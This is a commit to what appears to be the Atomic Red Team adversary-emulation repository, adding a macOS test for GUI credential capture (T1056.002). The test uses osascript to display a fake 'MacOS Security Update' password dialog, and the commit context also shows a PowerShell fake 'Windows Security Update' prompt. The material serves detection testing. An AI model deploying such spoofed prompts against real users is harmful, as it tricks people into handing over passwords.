Add T1056.002 Gui Input Capture macOS test (#2531)

Co-authored-by: Hare Sudhan <[email protected]>
redcanaryco · Oct 3, 2023 · 81368ac · 81368ac
1 parent 5e4a0ce
commit 81368ac
Showing 1 changed file with 12 additions and 1 deletion.
diff --git a/atomics/T1056.002/T1056.002.yaml b/atomics/T1056.002/T1056.002.yaml
@@ -26,4 +26,15 @@ atomic_tests:
       $cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName)
       # Using write-warning to allow message to show on console as echo and other similar commands are not visable from the Invoke-AtomicTest framework.
       write-warning $cred.GetNetworkCredential().Password
-    name: powershell
+    name: powershell
+- name: AppleScript - Spoofing a credential prompt using osascript
+  description: |
+    Prompt user for password without requiring permissions to send Apple events to System Settings.
+    https://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/
+  supported_platforms:
+  - macos
+  executor:
+    command: |
+      PWD_SPOOF=$(osascript -e 'display dialog "To perform a security update MacOS needs your passphrase." with title "MacOS Security Update" default answer "" with icon stop with hidden answer')
+      echo $PWD_SPOOF
+    name: bash